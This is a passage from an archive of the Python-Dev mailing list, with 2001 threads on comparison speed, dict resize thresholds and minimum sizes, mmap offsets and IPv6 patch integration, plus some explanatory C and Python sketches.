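/* Hypothetical rich-comparison helpers: each one does a full strcmp(),
   as a richcmp slot answering a single operator would. */
static int rich_eq(const char *a, const char *b) { compare_calls++; return strcmp(a, b) == 0; }
static int rich_lt(const char *a, const char *b) { compare_calls++; return strcmp(a, b) < 0; }
static int rich_gt(const char *a, const char *b) { compare_calls++; return strcmp(a, b) > 0; }

/* Emulate a 3-way cmp() by trying ==, then <, then >, in that order. */
static int cmp_via_richcmp(const char *a, const char *b)
{
    if (rich_eq(a, b))
        return 0;
    if (rich_lt(a, b))
        return -1;
    if (rich_gt(a, b))
        return 1;
    /* Not reached for strings: exactly one of ==, <, > holds. */
    assert(!"inconsistent rich comparisons");
    return 0;
}

/* The old path: a single strcmp() decides all three outcomes. */
static int cmp_via_strcmp(const char *a, const char *b)
{
    int c;
    compare_calls++;
    c = strcmp(a, b);
    return (c > 0) - (c < 0);
}
```

For example, cmp_via_richcmp("abd", "abc") leaves compare_calls at 3, while cmp_via_strcmp() on the same pair leaves it at 1.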

#2 is a special case that can be special-cased to death, but #1 likely
applies to code using cmp() for comparisons of objects of any type, and
that's the primary reason I've resisted adding richcmps to the
heavily-compared types (variously string, int, float, long, and type
objects).  It's also the case that adding "a fast path" shouldn't have to endure
wading thru multiple gimmicks (kinda defeats the idea of "fast" <wink>), so
the instant *one* heavily-compared basic type grows a richcmp (there are 0
such today), all should.

So that's what I'll aim at.


From guido@digicool.com  Thu May 17 19:18:27 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 14:18:27 -0400
Subject: [Python-Dev] IPv6
Message-ID: <200105171818.f4HIIRv12891@odiug.digicool.com>

What's our IPv6 story?  I recall that someone once sent me patches,
but they didn't work for me.  Is it time to try again?  In certain
circles IPv6 support in Python would be enough to switch programming
languages... :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@loewis.home.cs.tu-berlin.de  Thu May 17 20:45:29 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 21:45:29 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
Message-ID: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de>

> 1. Code using cmp(string1, string2) will clearly run significantly
>    slower, calling string comparison 1 (when == obtains), 2 (when <
>    obtains), or 3 (when > obtains) times instead of always once only.

I'd like to question the rationale behind this procedure. If a type
has both tp_compare and tp_richcompare, and the application is
performing cmp(o1, o2): Why is it then a good thing to emulate 3way
compare using rich compare?

I just changed the order in do_cmp, to the IMO more correct 

	if (v->ob_type == w->ob_type
	    && (f = v->ob_type->tp_compare) != NULL)
		return (*f)(v, w);
	c = try_rich_to_3way_compare(v, w);
	if (c < 2)
		return c;
	c = try_3way_compare(v, w);
	if (c < 2)
		return c;
	return default_3way_compare(v, w);

With that, I got only a single failure in the test suite:
test_userlist fails with

exceptions.RuntimeError: UserList.__cmp__() is obsolete

Tim thinks this is a bug in UserList, since __cmp__ is not obsolete; I
agree.

According to the CVS log, this implementation of do_cmp was installed
in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific
rationale for doing do_cmp in that order?

Regards,
Martin


From tim@digicool.com  Thu May 17 23:55:19 2001
From: tim@digicool.com (Tim Peters)
Date: Thu, 17 May 2001 18:55:19 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>

The worst percentage hit in both MAL's and Jeremy's pybench run was (here
showing Jeremy's numbers, cuz I doubt anyone could reproduce MAL's <wink>):

        DictCreation:      87.80 ms    2.93 us  +115.72%

Assorted things do not account for it:  the new overhead of linking and
unlinking dicts into the gc list (at creation and destruction times) seems
to account for no more than 2%; and the overhead due to using the slower
lookdict (as opposed to lookdict_string) even less.

Jeremy cheated by running a profiler:  the true cause is that dictresize
gets called about twice as often.

Before 2.1:  *before* inserting an item, we checked to see whether the dict
was at the resize point.  If so, we resized it.  Note that this meant
PyDict_SetItem could grow a dict even if no new entry was made (and that
this was the cause of several excruciating bugs in the 2.1 release cycle,
since it meant a dict could get reshuffled merely when replacing the values
associated with existing keys).

2.1:  *after* inserting an item, and if the key was new (i.e., the dict grew
a new entry, as opposed to just replacing the value associated with an
existing key), and the dict is at the resize point, we resize it.

Now the DictCreation test overwhelmingly creates dicts of size exactly 3.
The dict resizes from empty to capacity 4 on the way to gaining 2 entries.
When adding the third:

Before 2.1:  2 < (2/3)*4 == 2 2/3, so the dict is not resized and ends up
remaining a capacity-4 dict with 3 slots full.  This actually violates a
documented dict invariant (i.e., that dicts are never more than 2/3rd full).

2.1:  The third item added is a new item, and 3 > (2/3)*4 == 2 2/3, so we
*do* resize it, and the dict ends up with 3 of 8 slots full.
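The two policies can be compared with a toy model. This is a simplified sketch, not dictobject.c: it tracks only counts, assumes every insertion adds a new key, and assumes growth goes from empty to 4 slots and then doubles (the real dictresize() derives the new size from the number of used entries). All names are hypothetical.

```c
#include <assert.h>

/* Simplified dict bookkeeping: only the counts matter here. */
struct toy_dict {
    int size;     /* number of slots (0 for a brand-new empty dict) */
    int fill;     /* number of non-virgin slots */
    int resizes;  /* how many times the table was grown */
};

/* Simplified growth: empty -> 4 slots, otherwise double. */
static void toy_grow(struct toy_dict *d)
{
    d->size = (d->size == 0) ? 4 : d->size * 2;
    d->resizes++;
}

/* Pre-2.1 rule: check the 2/3 limit *before* every insertion. */
static void insert_pre21(struct toy_dict *d)
{
    if (d->fill * 3 >= d->size * 2)
        toy_grow(d);
    d->fill++;              /* every call adds a new key */
}

/* 2.1 rule: make room only if the table is empty, then check the
   2/3 limit *after* inserting the new key. */
static void insert_21(struct toy_dict *d)
{
    if (d->fill >= d->size)
        toy_grow(d);
    d->fill++;
    if (d->fill * 3 >= d->size * 2)
        toy_grow(d);
}

/* Build a dict of n distinct keys under the chosen rule. */
static struct toy_dict build(int n, void (*insert)(struct toy_dict *))
{
    struct toy_dict d = {0, 0, 0};
    int i;
    assert(n >= 0);
    for (i = 0; i < n; i++)
        insert(&d);
    return d;
}
```

Under this model, building 3 keys costs 1 resize (ending at 4 slots) with the pre-2.1 rule and 2 resizes (ending at 8 slots) with the 2.1 rule; building 4 keys costs 2 resizes under both rules.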

I've got no interest in trying to restore the old behavior.  A compromise
may be to boost the minimum size of a non-empty dict from 4 to 8.  As is,
the only non-empty dicts that can get away with using the current minimum
size of 4 have no more than 2 elements.  The question is whether such tiny
non-empty dicts are common enough to make everyone else pay for "an extra"
resize.

go-ahead-just-*try*-to-prove-your-answer<wink>-ly y'rs  - tim


From skip@pobox.com  Fri May 18 00:21:50 2001
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 17 May 2001 18:21:50 -0500
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <15108.23822.538016.564151@beluga.mojam.com>

    Guido> In certain circles IPv6 support in Python would be enough to
    Guido> switch programming languages... :-)

Sounds like someone has caught the scent of world domination... ;-)

S


From jeremy@digicool.com  Thu May 17 19:39:07 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Thu, 17 May 2001 14:39:07 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
Message-ID: <15108.6859.810306.811326@slothrop.digicool.com>

Another option is to change the benchmark to put one more item in the
dict.  Then the same number of resizes would occur with both versions
of Python.

Jeremy


From tim.one@home.com  Fri May 18 01:08:13 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 17 May 2001 20:08:13 -0400
Subject: [Python-Dev] mmap module
In-Reply-To: <3B03E6B1.A19F6594@STScI.Edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEOKKCAA.tim.one@home.com>

[Paul Barrett]
> In the CVS log of the mmapmodule.c, Tim Peters says:
>
> "The code really needs to be rethought from scratch (not by me, though
> ...)."

That was in specific reference to the code I changed, in mmap_find_method.
The difficulty is that mmap is great for "large files", but the code before
my change used a C int for the starting offset and also for the return value;
I boosted those to a C long, which covers 63 bits on 64-bit Linux boxes, but
doesn't help 64-bit Windows at all (where a C long remains 4 bytes).  The
mmap_object struct uses size_t to declare the relevant members, which is
possibly better still than C long, but may still leave platform capabilities
out of reach for large files (e.g., "even Win95" *allows* specifying 64-bit
offsets when creating a mapped file view).  C is a friggin' mess here, and
Python's PyArg_ParseTuple() and Py_BuildValue() don't cater to the full range
of C integral types anyway.  In other words, if this code is ever to reach
its full potential, it "really needs to be rethought from scratch".

> Well, I might be the person to do the rethinking, but I'd first like
> to know what Tim has in mind.

Nothing that you did <wink>.

> I've been playing around with this module lately and tend to agree
> that some enhancements could be made, particularly to prevent "bus
> errors" and "segmentation faults".

When you get one of those, it's a bug in Python!

> The ability to have offsets into a file that are not multiples of the
> system pagesize would also be nice.

It's OS-specific.  Python should grow warts to protect against it on the OSes
that care.
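One common technique for offering offsets that are not page multiples, given here as an assumption rather than anything proposed in this thread: map from the granularity boundary at or below the requested offset, map `delta` extra bytes, and hand the caller a pointer `delta` bytes into the view. The granularity would be the page size on Unix (sysconf(_SC_PAGESIZE)) or the allocation granularity on Windows (from GetSystemInfo()). The struct and function names are hypothetical, and the actual mmap()/MapViewOfFile() calls are left out.

```c
#include <assert.h>
#include <stdint.h>

/* How to satisfy a request at an arbitrary offset with a mapping
   that must start on a granularity boundary. */
struct aligned_request {
    uint64_t map_offset;  /* offset actually passed to the OS (aligned) */
    uint64_t delta;       /* bytes to skip at the start of the view */
    uint64_t map_length;  /* bytes to map so the caller still gets len */
};

/* granularity must be a power of two. */
static struct aligned_request align_request(uint64_t offset, uint64_t len,
                                            uint64_t granularity)
{
    struct aligned_request r;
    assert(granularity != 0 && (granularity & (granularity - 1)) == 0);
    r.map_offset = offset & ~(granularity - 1);  /* round down */
    r.delta = offset - r.map_offset;
    r.map_length = len + r.delta;
    return r;
}
```

For example, a request for 100 bytes at offset 10000 with a 4096-byte granularity maps 1908 bytes starting at offset 8192 and skips the first 1808.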

> I'd be willing to submit a PEP on a new mmapmodule, once I know what
> others would like.

Hard to say.  This has the potential to become Python's next thread
subsystem, i.e. an endless and ultimately hopeless x-platform nightmare.  If
you do write a PEP, I vote to say that we'll cover Windows and Linux (and
maybe Mac OS X?) out of the box, but any other platform is at your own risk
(it doesn't really help if somebody pops up volunteering to support a
minority platform, because they eventually go away, their code stops working,
and it never gets fixed -- so it's use-at-your-own-risk in reality
regardless).


From tim.one@home.com  Fri May 18 01:29:18 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 17 May 2001 20:29:18 -0400
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOKKCAA.tim.one@home.com>

[Guido van Rossum]
> What's our IPv6 story?

Ah!  If that's version 6 of the Integer-Point alternative to Floating-Point,
I've got it covered.  Otherwise my guess is we have no story at all.

> I recall that someone once sent me patches, but they didn't work for me.

Try recompiling with -DLONG_BIT=33.

> Is it time to try again?  In certain circles IPv6 support in Python
> would be enough to switch programming languages... :-)

Floating-point is *that* bad?!

ever-helpful-ly y'rs  - tim


From jeremy@digicool.com  Thu May 17 23:16:15 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Thu, 17 May 2001 18:16:15 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
Message-ID: <15108.19887.534514.864376@slothrop.digicool.com>

>>>>> "TP" == Tim Peters <tim@digicool.com> writes:

  TP> I've got no interest in trying to restore the old behavior.  A
  TP> compromise may be to boost the minimum size of a non-empty dict
  TP> from 4 to 8.  As is, the only non-empty dicts that can get away
  TP> with using the current minimum size of 4 have no more than 2
  TP> elements.  The question is whether such tiny non-empty dicts are
  TP> common enough to make everyone else pay for "an extra" resize.

I also did a profile run on CreateInstances, which has a difference of
+55.54% on my machine.  It's basically the same story.  The instance
dictionary is getting resized more often with Python 2.1+ than it did
with Python 1.5.2.  I wouldn't be surprised if several more tests are
showing a slowdown with the same cause.

So boosting the minimum size sounds like a good thing.

Jeremy


From tim.one@home.com  Fri May 18 04:26:52 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 17 May 2001 23:26:52 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <005701c0dd38$2f417560$0900a8c0@spiff>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOOKCAA.tim.one@home.com>

[/F]
> more info here:
>
> http://home.rica.net/alphae/419coal/index.htm
>
>     "A Five Billion US$ (as of 1996, much more now) worldwide
>     Scam which has run since the early 1980's under Successive
>     Governments of Nigeria.
>
>     "The Nigerian Scam is, according to published reports, the
>     Third to Fifth largest industry in Nigeria."

Most interesting to me is that the US Post Office is upset about this:

    http://www.usps.gov/websites/depart/inspect/pressrel.htm

They don't seem to care so much that people are getting scammed, but that the
letters mailed from Nigeria to advance the fee-extorting phase of the scam
often use counterfeit postage!  Where else but here

    http://www.usps.gov/websites/depart/inspect/metercap.htm

could you learn that "Postage meters are not used in Nigeria -- therefore,
all postage meter impressions on Nigerian mail are counterfeit!"?

governments-are-mostly-insane-ly y'rs  - tim


From martin@loewis.home.cs.tu-berlin.de  Fri May 18 05:45:21 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 18 May 2001 06:45:21 +0200
Subject: [Python-Dev] IPv6
References: <oqbsosgh94.fsf@lin2.sram.qc.ca>
Message-ID: <200105180445.f4I4jL101178@mira.informatik.hu-berlin.de>

> What's our IPv6 story?  I recall that someone once sent me patches,
> but they didn't work for me.  Is it time to try again?  In certain
> circles IPv6 support in Python would be enough to switch programming
> languages... :-)

It's still on SF,

http://sourceforge.net/tracker/index.php?func=detail&aid=401196&group_id=5470&atid=305470

There are three problems with that patch, AFAICT:

1. It is too large for any individual to review in one chunk.
2. It gets quickly outdated.
3. It touches core aspects of the socket handling that are IMO better
   untouched. I don't know whether the generalization proposed there
   is necessary to support IPv6 reasonably - the author certainly feels
   it is.

To integrate the patch, I would propose to split it into smaller
parts, and submit and review them one-by-one. The first patch should
deal only with autoconf stuff, so that the proper #defines are in
config.h (although they would not be used right away). The second
patch should be a tar file of all new files (the patch on SF actually
misses some files). The third patch should include changes to the C
modules, and the last one changes to the standard library modules.

For that procedure to work, we need cooperation from the
submitter. For that, we probably need to indicate that we are really
interested in his work, and will work with him to integrate it into
Python. So far, his impression must be that nobody is interested - the
patch has been sitting there since 2000-08-16, making it the oldest open
patch.

Undoubtedly, integrating this piece of work will result in various
problems with Python CVS: it won't build anymore on "funny machines"
(like Windows), and it might even crash on code that used to work just
fine. This prediction is not based on the actual content of the patch,
merely on its size, and the fact that IPv6 support is experimental on
many systems. So we'd also need a BDFL pronouncement that we really
really want this, and that anybody running into problems should either
help fix them, or stay away from CVS while it is being integrated.

Regards,
Martin


From tim@digicool.com  Fri May 18 08:17:07 2001
From: tim@digicool.com (Tim Peters)
Date: Fri, 18 May 2001 03:17:07 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <15108.19887.534514.864376@slothrop.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPCKCAA.tim@digicool.com>

[Jeremy]
> I also did a profile run on CreateInstances, which has a difference of
> +55.54% on my machine.  It's basically the same story.  The instance
> dictionary is getting resized more often with Python 2.1+ than it did
> with Python 1.5.2.  I wouldn't be surprised if several more tests are
> showing a slowdown with the same cause.
>
> So boosting the minimum size sounds like a good thing.

I don't know.  PyBench is great for showing that *something* changed, but
it's got even less claim to "typical use" than pystone.

I don't know that the test suite is better in that respect, but it's got much
more variety and everyone has it <wink>.  I stuffed code in dict_dealloc() to
record the ma_fill of each dict on its way to the grave (ma_fill == number of
non-virgin slots).  Across the test suite, here's the ranking, from most to
least popular fill:

  count    fill %total  cumulative %
 ------    ---- ------  ------------
 146321       1  53.30  53.30
  38200       0  13.91  67.21
  32616       2  11.88  79.09
  29648       3  10.80  89.89
   9884       5   3.60  93.49
   5423       4   1.98  95.47
   2428       6   0.88  96.35
   2016       8   0.73  97.08
   1179       7   0.43  97.51
    904       9   0.33  97.84
    709     103   0.26  98.10
    554      10   0.20  98.30
    513      13   0.19  98.49
    459      12   0.17  98.66
    447      11   0.16  98.82
    364      14   0.13  98.95
    233      15   0.08  99.04
    231      16   0.08  99.12
    193      18   0.07  99.19
    180      17   0.07  99.26
    122      19   0.04  99.30
    107      30   0.04  99.34
    105      21   0.04  99.38
     93      22   0.03  99.41
     93      20   0.03  99.45
     86     256   0.03  99.48
     82      23   0.03  99.51
     80      26   0.03  99.54
     74      24   0.03  99.56
     69      27   0.03  99.59
     64      25   0.02  99.61
     60      29   0.02  99.63
     49      28   0.02  99.65
     44      34   0.02  99.67
     33      32   0.01  99.68
     28      31   0.01  99.69
     27      37   0.01  99.70
     27      33   0.01  99.71
     26      35   0.01  99.72
     24      36   0.01  99.73
     23      39   0.01  99.74
     23      38   0.01  99.75
     21     128   0.01  99.75
     19      44   0.01  99.76
     19      40   0.01  99.77
     17      46   0.01  99.77
     16      48   0.01  99.78
     15      47   0.01  99.78
     14      50   0.01  99.79
     14      42   0.01  99.79

There are many more sizes, but I cut off the display here when they got too
rare to round to 1% of 1% of the total count.

Boosting the first non-empty size to 8 would allow 93+% of all dicts to get
away with at most one resize (a dict of size 8 is enough for a fill of 5, but
not 6).  OTOH, the current first non-empty size of 4 is enough for 79% of all
dicts (enough for a fill of 2, but not 3).  If oodles of those tiny dicts are
alive *at the same time*, it would be quite a waste of space to force the
non-empty ones to carry 8 slots.  OTOH, if those small dicts are due to
things like building one- or two-element keyword argument dicts, their
lifetimes rarely overlap.

A more aggressive idea is to allow denser dicts, by allowing them to become
no more than 75% full.  That is, change the resize test from

    mp->ma_fill*3 >= mp->ma_size*2

to

    mp->ma_fill*4 > mp->ma_size*3

That would allow the 10.8% of real(er) life dicts with fill 3 to continue
living in dicts with 4 slots, and allow about 90% of all dicts to get away
with no more than one resize.  The downside is that boosting the max load
factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit,
a small boost in the expected # of compares.  But the "theory" is for random
hash functions with "uniform probing" (tech term that does *not* mean linear
probing), and Python's hash functions often aren't random at all, while AFAIK
no rigorous analysis of its probing strategy exists.
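The two resize tests above can be checked directly. This sketch (function names hypothetical) finds the largest fill a table of a given size reaches before each post-insert test fires.

```c
#include <assert.h>

/* Current rule: resize once the table is at least 2/3 full. */
static int needs_resize_2_3(int fill, int size) { return fill * 3 >= size * 2; }

/* Proposed rule: resize only once the table is more than 3/4 full. */
static int needs_resize_3_4(int fill, int size) { return fill * 4 > size * 3; }

/* Largest fill a table of `size` slots reaches without the post-insert
   test firing.  Terminates because both rules fire at fill == size. */
static int max_fill_without_resize(int size, int (*needs_resize)(int, int))
{
    int fill = 0;
    assert(size > 0);
    while (!needs_resize(fill + 1, size))
        fill++;
    return fill;
}
```

Under the 2/3 test, 4 slots hold a fill of 2 and 8 slots a fill of 5; under the 3/4 test, 4 slots hold a fill of 3, matching the figures given above.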

So, plenty of arbitrary data there upon which to flip a coin <wink>.


From mal@lemburg.com  Fri May 18 08:26:36 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 09:26:36 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com>
Message-ID: <3B04CEAC.57251CD7@lemburg.com>

Jeremy Hylton wrote:
> 
> >>>>> "TP" == Tim Peters <tim@digicool.com> writes:
> 
>   TP> I've got no interest in trying to restore the old behavior.  A
>   TP> compromise may be to boost the minimum size of a non-empty dict
>   TP> from 4 to 8.  As is, the only non-empty dicts that can get away
>   TP> with using the current minimum size of 4 have no more than 2
>   TP> elements.  The question is whether such tiny non-empty dicts are
>   TP> common enough to make everyone else pay for "an extra" resize.
> 
> I also did a profile run on CreateInstances, which has a difference of
> +55.54% on my machine.  It's basically the same story.  The instance
> dictionary is getting resized more often with Python 2.1+ than it did
> with Python 1.5.2.  I wouldn't be surprised if several more tests are
> showing a slowdown with the same cause.
> 
> So boosting the minimum size sounds like a good thing.

FYI, I have a patch which inlines small dictionaries directly
into the type object (rather than using malloc to allocate
the slot buffer).

I've experimented with the minimal size a lot and found that
setting it to 8 slots gives the best performance/memory tradeoff.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim@digicool.com  Fri May 18 09:32:39 2001
From: tim@digicool.com (Tim Peters)
Date: Fri, 18 May 2001 04:32:39 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>

[MAL]
> FYI, I have a patch which inlines small dictionaries directly
> into the type object

You don't mean that, but how about uploading the patch to SF anyway?  Assign
it to me and I'll dig into it.

> ...
> I've experimented with the minimal size a lot and found that
> setting it to 8 slots gives the best performance/memory tradeoff.

Having done just a couple rounds of instrumented runs across various apps, I
was moving to that conclusion too.  Also that "small" dicts are so common
that avoiding the "extra" malloc would be a nice win for them, and that large
dicts are rare enough and resizing expensive enough anyway that the new cost
of doing a two-headed allocation strategy would be lost in the noise.  IOW,
I'm inclined to believe that everything you say your patch does is Good For
Python, and Guido is so sympathetic to my lack of sleep lately that I bet
he'll let me slip in one uglification without scowling <wink>.


From mal@lemburg.com  Fri May 18 12:36:28 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 13:36:28 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <3B05093C.8248AE96@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

Right, I meant the dict object... (the "not enough coffee" thingie
again ;-)
 
> > ...
> > I've experimented with the minimal size a lot and found that
> > setting it to 8 slots gives the best performance/memory tradeoff.
> 
> Having done just a couple rounds of instrumented runs across various apps, I
> was moving to that conclusion too.  Also that "small" dicts are so common
> that avoiding the "extra" malloc would be a nice win for them, and that large
> dicts are rare enough and resizing expensive enough anyway that the new cost
> of doing a two-headed allocation strategy would be lost in the noise.  IOW,
> I'm inclined to believe that everything you say your patch does is Good For
> Python, and Guido is so sympathetic to my lack of sleep lately that I bet
> he'll let me slip in one uglification without scowling <wink>.

I'll see if I find time today to rework the patch for Python CVS.
The patch is hiding in my old Python 1.5 killer patch ;-) -- which
gives more than a 50% boost on my machine, but that's another
story.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Fri May 18 12:38:39 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 13:38:39 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCAEPCKCAA.tim@digicool.com>
Message-ID: <3B0509BF.A2F84A30@lemburg.com>

Tim Peters wrote:
> 
> [Jeremy]
> > I also did a profile run on CreateInstances, which has a difference of
> > +55.54% on my machine.  It's basically the same story.  The instance
> > dictionary is getting resized more often with Python 2.1+ than it did
> > with Python 1.5.2.  I wouldn't be surprised if several more tests are
> > showing a slowdown with the same cause.
> >
> > So boosting the minimum size sounds like a good thing.
> 
> I don't know.  PyBench is great for showing that *something* changed, but
> it's got even less claim to "typical use" than pystone.

It doesn't claim "typical use". pybench is aimed at finding out
performance issues about hot-spots -- there's no such thing as
a "typical program", so pybench gives you low level performance
compares for very specific tasks, e.g. dictionary creation or
for-loop performance.

I have found it to be rather successful at that. At least it gives
some good hints about where to look...
 
> I don't know that the test suite is better in that respect, but it's got much
> more variety and everyone has it <wink>.  I stuffed code in dict_dealloc() to
> record the ma_fill of each dict on its way to the grave (ma_fill == number of
> non-virgin slots).  Across the test suite, here's the ranking, from most to
> least popular fill:
> 
>   count    fill %total  cumulative %
>  ------    ---- ------  ------------
>  146321       1  53.30  53.30
>   38200       0  13.91  67.21
>   32616       2  11.88  79.09
>   29648       3  10.80  89.89
>    9884       5   3.60  93.49
>    5423       4   1.98  95.47
>    2428       6   0.88  96.35
>    2016       8   0.73  97.08
>    1179       7   0.43  97.51
>     904       9   0.33  97.84
>     709     103   0.26  98.10
>     554      10   0.20  98.30
>     513      13   0.19  98.49
>     459      12   0.17  98.66
>     447      11   0.16  98.82
>     364      14   0.13  98.95
>     233      15   0.08  99.04
>     231      16   0.08  99.12
>     193      18   0.07  99.19
>     180      17   0.07  99.26
>     122      19   0.04  99.30
>     107      30   0.04  99.34
>     105      21   0.04  99.38
>      93      22   0.03  99.41
>      93      20   0.03  99.45
>      86     256   0.03  99.48
>      82      23   0.03  99.51
>      80      26   0.03  99.54
>      74      24   0.03  99.56
>      69      27   0.03  99.59
>      64      25   0.02  99.61
>      60      29   0.02  99.63
>      49      28   0.02  99.65
>      44      34   0.02  99.67
>      33      32   0.01  99.68
>      28      31   0.01  99.69
>      27      37   0.01  99.70
>      27      33   0.01  99.71
>      26      35   0.01  99.72
>      24      36   0.01  99.73
>      23      39   0.01  99.74
>      23      38   0.01  99.75
>      21     128   0.01  99.75
>      19      44   0.01  99.76
>      19      40   0.01  99.77
>      17      46   0.01  99.77
>      16      48   0.01  99.78
>      15      47   0.01  99.78
>      14      50   0.01  99.79
>      14      42   0.01  99.79
> 
> There are many more sizes, but I cut off the display here when they got too
> rare to round to 1% of 1% of the total count.
> 
> Boosting the first non-empty size to 8 would allow 93+% of all dicts to get
> away with at most one resize (a dict of size 8 is enough for a fill of 5, but
> not 6).  OTOH, the current first non-empty size of 4 is enough for 79% of all
> dicts (enough for a fill of 2, but not 3).  If oodles of those tiny dicts are
> alive *at the same time*, it would be quite a waste of space to force the
> non-empty ones to carry 8 slots.  OTOH, if those small dicts are due to
> things like building one- or two-element keyword argument dicts, their
> lifetimes rarely overlap.

I found that instance dictionaries are usually within the 8-slot
range. You normally have a few heavyweight instances and
many lightweight ones which only have two or three attributes
in their instance dict.
 
> A more aggressive idea is to allow denser dicts, by allowing them to become
> no more than 75% full.  That is, change the resize test from
> 
>     mp->ma_fill*3 >= mp->ma_size*2
> 
> to
> 
>     mp->ma_fill*4 > mp->ma_size*3
> 
> That would allow the 10.8% of real(er) life dicts with fill 3 to continue
> living in dicts with 4 slots, and allow about 90% of all dicts to get away
> with no more than one resize.  The downside is that boosting the max load
> factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit,
> a small boost in the expected # of compares.  But the "theory" is for random
> hash functions with "uniform probing" (tech term that does *not* mean linear
> probing), and Python's hash functions often aren't random at all, while AFAIK
> no rigorous analysis of its probing strategy exists.
> 
> So, plenty of arbitrary data there upon which to flip a coin <wink>.

Why not make those parameters macros at the top of dictobject.c
which can then be tuned to whatever the programmer needs/wants ?!
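To make the two resize tests quoted above concrete, here is a minimal Python sketch that finds the largest fill each test allows for a given table size. It assumes the test is checked against the fill count after an insertion, which reproduces the "size 8 holds a fill of 5, but not 6" figure; the helper names are hypothetical and do not exist in dictobject.c.

```python
def needs_resize_2_3(fill, size):
    # Current test: mp->ma_fill*3 >= mp->ma_size*2 (max load factor 2/3)
    return fill * 3 >= size * 2


def needs_resize_3_4(fill, size):
    # Proposed test: mp->ma_fill*4 > mp->ma_size*3 (max load factor 3/4)
    return fill * 4 > size * 3


def max_fill(size, needs_resize):
    """Largest fill a table of `size` slots holds before the test fires."""
    fill = 0
    while not needs_resize(fill + 1, size):
        fill += 1
    return fill


if __name__ == "__main__":
    for size in (4, 8, 16):
        # prints: size, max fill under 2/3, max fill under 3/4
        print(size, max_fill(size, needs_resize_2_3),
              max_fill(size, needs_resize_3_4))
```

With the 2/3 rule a 4-slot table stops at a fill of 2 and an 8-slot table at 5; with the 3/4 rule those become 3 and 6, which is why the fill-3 dicts could stay in 4 slots.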

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Fri May 18 16:05:45 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 10:05:45 -0500
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 04:32:39 -0400."
 <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>

> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

(I guess he means the buffer is alloc'ed contiguously with the dict
